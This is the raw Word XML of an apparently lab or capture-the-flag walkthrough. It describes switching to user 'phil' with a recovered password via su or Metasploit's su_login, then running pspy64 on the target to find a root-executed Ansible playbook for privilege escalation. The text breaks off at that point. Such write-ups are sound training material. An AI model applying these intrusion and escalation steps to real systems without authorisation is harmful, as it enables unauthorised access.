    <w:p w14:paraId="3B86D4E2" w14:textId="125F16CE" w:rsidR="005B2E84" w:rsidRDefault="005B2E84" w:rsidP="005B2E84">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E54D6FB" w14:textId="38C3EFBF" w:rsidR="005B2E84" w:rsidRDefault="005B2E84" w:rsidP="005B2E84">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="567EBAA9" w14:textId="1BFF802E" w:rsidR="005B2E84" w:rsidRDefault="005B2E84" w:rsidP="005B2E84">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="644891E0" w14:textId="38805334" w:rsidR="005B2E84" w:rsidRDefault="005B2E84" w:rsidP="005B2E84">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6321CADE" w14:textId="12CB9F60" w:rsidR="005B2E84" w:rsidRDefault="005B2E84" w:rsidP="005B2E84">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">So now we have the password for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>phil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">, we only have to log in the system as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>phil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> and there are two ways to do it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25488F8F" w14:textId="34B8539E" w:rsidR="005B2E84" w:rsidRDefault="005B2E84" w:rsidP="005B2E84">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Manually: go into shell mode, and type </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>su</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> -l </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>phil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>, when password is asked copy paste it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C13EDD" w14:textId="3E3D422B" w:rsidR="005B2E84" w:rsidRDefault="006D25C3" w:rsidP="005B2E84">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251676672" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0560A266" wp14:editId="225245D8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>259080</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>195580</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="3253740"/>
            <wp:effectExtent l="0" t="0" r="2540" b="381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53740"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="005B2E84">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005B2E84">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005B2E84">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">, search for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005B2E84">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>su_login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005B2E84">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">, and fill </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005B2E84">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>al</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005B2E84">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> the info in:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405ED68A" w14:textId="56E3E8A7" w:rsidR="005B2E84" w:rsidRDefault="005B2E84" w:rsidP="005B2E84">
      <w:pPr>
        <w:ind w:left="1980"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41E0FB85" w14:textId="0655B8A3" w:rsidR="006D25C3" w:rsidRDefault="006D25C3" w:rsidP="005B2E84">
      <w:pPr>
        <w:ind w:left="1980"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="219908BA" w14:textId="06F0944D" w:rsidR="006D25C3" w:rsidRDefault="006D25C3" w:rsidP="005B2E84">
      <w:pPr>
        <w:ind w:left="1980"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56760173" w14:textId="08226A74" w:rsidR="006D25C3" w:rsidRDefault="006D25C3" w:rsidP="005B2E84">
      <w:pPr>
        <w:ind w:left="1980"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B5A972B" w14:textId="4D661AD9" w:rsidR="006D25C3" w:rsidRDefault="006D25C3" w:rsidP="005B2E84">
      <w:pPr>
        <w:ind w:left="1980"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6120C295" w14:textId="40D5C078" w:rsidR="006D25C3" w:rsidRDefault="006D25C3" w:rsidP="005B2E84">
      <w:pPr>
        <w:ind w:left="1980"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63459C79" w14:textId="0090C8D8" w:rsidR="006D25C3" w:rsidRDefault="006D25C3" w:rsidP="005B2E84">
      <w:pPr>
        <w:ind w:left="1980"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D75B5BF" w14:textId="359F47E3" w:rsidR="006D25C3" w:rsidRDefault="006D25C3" w:rsidP="005B2E84">
      <w:pPr>
        <w:ind w:left="1980"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67B21777" w14:textId="3463445A" w:rsidR="006D25C3" w:rsidRDefault="006D25C3" w:rsidP="005B2E84">
      <w:pPr>
        <w:ind w:left="1980"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1767A7E1" w14:textId="2BF84626" w:rsidR="006D25C3" w:rsidRDefault="006D25C3" w:rsidP="005B2E84">
      <w:pPr>
        <w:ind w:left="1980"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FB77FAF" w14:textId="7F475225" w:rsidR="006D25C3" w:rsidRDefault="006D25C3" w:rsidP="005B2E84">
      <w:pPr>
        <w:ind w:left="1980"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49FFC439" w14:textId="2C5A4CE3" w:rsidR="006D25C3" w:rsidRDefault="006D25C3" w:rsidP="005B2E84">
      <w:pPr>
        <w:ind w:left="1980"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251677696" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7EBC24AB" wp14:editId="7F446955">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>251460</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>212090</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="1527175"/>
            <wp:effectExtent l="0" t="0" r="2540"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27175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D6726D" w14:textId="1F445990" w:rsidR="006D25C3" w:rsidRDefault="006D25C3" w:rsidP="005B2E84">
      <w:pPr>
        <w:ind w:left="1980"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C2CAC87" w14:textId="720920F8" w:rsidR="006D25C3" w:rsidRDefault="006D25C3" w:rsidP="005B2E84">
      <w:pPr>
        <w:ind w:left="1980"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6342C041" w14:textId="12D668B0" w:rsidR="006D25C3" w:rsidRDefault="006D25C3" w:rsidP="005B2E84">
      <w:pPr>
        <w:ind w:left="1980"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23DB9F81" w14:textId="62B57450" w:rsidR="006D25C3" w:rsidRDefault="006D25C3" w:rsidP="006D25C3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="663C1CB1" w14:textId="7D975C1B" w:rsidR="006D25C3" w:rsidRDefault="006D25C3" w:rsidP="006D25C3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">And we’re in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>phil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B56043" w14:textId="6DD1143D" w:rsidR="006D25C3" w:rsidRDefault="006D25C3" w:rsidP="006D25C3">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>PrivEsc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>: Phil -&gt; Root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09024C31" w14:textId="75FB7799" w:rsidR="006D25C3" w:rsidRDefault="006D25C3" w:rsidP="006D25C3">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">So we’ve got the user flag, now we only need the root flag. This is located in /root, which is a directory that’s only accessible for root. So somehow we need to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>PrivEsc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> to root. I’ve tried the good old </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> -l, but </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>phil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> is not in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>sudoers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> and can’t use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">. So the next step to check all the files that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>phil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> can access but frank can’t. This didn’t result in anything interesting. Next is to run pspy64 on the system to see all the processes that are running in the background, in hopes of catching a weird process or an accessible process that automatically gets executed with root </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>privilieges</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B282929" w14:textId="696EE0DC" w:rsidR="006D25C3" w:rsidRDefault="006D25C3" w:rsidP="006D25C3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DB536C8" w14:textId="33D25DBA" w:rsidR="006D25C3" w:rsidRDefault="006D25C3" w:rsidP="006D25C3">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Pspy64 results:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6576F038" w14:textId="77777777" w:rsidR="006D25C3" w:rsidRPr="006D25C3" w:rsidRDefault="006D25C3" w:rsidP="006D25C3">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28627D8A" w14:textId="2BE5064E" w:rsidR="006D25C3" w:rsidRDefault="006D25C3" w:rsidP="006D25C3">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251678720" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="468B61C4" wp14:editId="61F659B9">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>160020</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>222250</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="4138930"/>
            <wp:effectExtent l="0" t="0" r="2540" b="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38930"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Get it on the target machine and make it executable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500AEF0A" w14:textId="54CD437E" w:rsidR="006D25C3" w:rsidRDefault="006D25C3" w:rsidP="006D25C3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61A31E4D" w14:textId="5716E970" w:rsidR="006D25C3" w:rsidRDefault="006D25C3" w:rsidP="006D25C3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="250641C2" w14:textId="7C1581AB" w:rsidR="006D25C3" w:rsidRDefault="006D25C3" w:rsidP="006D25C3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="601C874A" w14:textId="417EF9A0" w:rsidR="006D25C3" w:rsidRDefault="006D25C3" w:rsidP="006D25C3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F3B3D80" w14:textId="5EB33130" w:rsidR="006D25C3" w:rsidRDefault="006D25C3" w:rsidP="006D25C3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B72E88A" w14:textId="224FB167" w:rsidR="006D25C3" w:rsidRDefault="006D25C3" w:rsidP="006D25C3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="665589E4" w14:textId="7A97E8FC" w:rsidR="006D25C3" w:rsidRDefault="006D25C3" w:rsidP="006D25C3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30D200BC" w14:textId="03730970" w:rsidR="006D25C3" w:rsidRDefault="006D25C3" w:rsidP="006D25C3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F3DB8B2" w14:textId="2DE3688B" w:rsidR="006D25C3" w:rsidRDefault="006D25C3" w:rsidP="006D25C3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="082E7B49" w14:textId="7A3C4A60" w:rsidR="006D25C3" w:rsidRDefault="006D25C3" w:rsidP="006D25C3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75FE412E" w14:textId="361768BD" w:rsidR="006D25C3" w:rsidRDefault="006D25C3" w:rsidP="006D25C3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B19EB35" w14:textId="6C613435" w:rsidR="006D25C3" w:rsidRDefault="006D25C3" w:rsidP="006D25C3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="681CBAEE" w14:textId="313C2909" w:rsidR="006D25C3" w:rsidRDefault="006D25C3" w:rsidP="006D25C3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BFEF950" w14:textId="2FAF50FF" w:rsidR="006D25C3" w:rsidRDefault="006D25C3" w:rsidP="006D25C3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73C325DE" w14:textId="44B970A7" w:rsidR="006D25C3" w:rsidRDefault="006D25C3" w:rsidP="006D25C3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251679744" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="364B9619" wp14:editId="6A59E27C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>160020</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>113665</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="1179830"/>
            <wp:effectExtent l="0" t="0" r="2540" b="127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179830"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D6E6F0" w14:textId="0C7B4C16" w:rsidR="006D25C3" w:rsidRDefault="006D25C3" w:rsidP="006D25C3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ABC4EA7" w14:textId="19239CB9" w:rsidR="006D25C3" w:rsidRDefault="006D25C3" w:rsidP="006D25C3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="064027D2" w14:textId="14E0CF1C" w:rsidR="006D25C3" w:rsidRDefault="006D25C3" w:rsidP="006D25C3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F761E1F" w14:textId="416E4089" w:rsidR="006D25C3" w:rsidRDefault="006D25C3" w:rsidP="006D25C3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DAEA73B" w14:textId="7EDC089C" w:rsidR="006D25C3" w:rsidRDefault="006D25C3" w:rsidP="006D25C3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A43425B" w14:textId="77777777" w:rsidR="006D25C3" w:rsidRDefault="006D25C3" w:rsidP="006D25C3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26A82843" w14:textId="2E2B6CB1" w:rsidR="006D25C3" w:rsidRDefault="006D25C3" w:rsidP="006D25C3">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Run it ./pspy64:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F58F2D" w14:textId="7AD220EC" w:rsidR="006D25C3" w:rsidRDefault="006D25C3" w:rsidP="006D25C3">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251680768" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="48C3B263" wp14:editId="2BF912C4">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>364490</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7365038" cy="495300"/>
            <wp:effectExtent l="0" t="0" r="7620"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65038"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After running for a couple of minutes, I noticed a process that automatically is getting executed on root, in the opt directory: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0283DD2C" w14:textId="0D51C0F3" w:rsidR="006D25C3" w:rsidRDefault="006D25C3" w:rsidP="006D25C3">
      <w:pPr>
        <w:ind w:left="2520"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1463D24B" w14:textId="34466C60" w:rsidR="006D25C3" w:rsidRDefault="006D25C3" w:rsidP="006D25C3">
      <w:pPr>
        <w:ind w:left="2520"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09BA0000" w14:textId="770D1E30" w:rsidR="006D25C3" w:rsidRDefault="006D25C3" w:rsidP="006D25C3">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>We see that playbook_1.yml is getting executed in the first line</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4C0E20" w14:textId="75CD8DE8" w:rsidR="006D25C3" w:rsidRDefault="006D25C3" w:rsidP="006D25C3">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
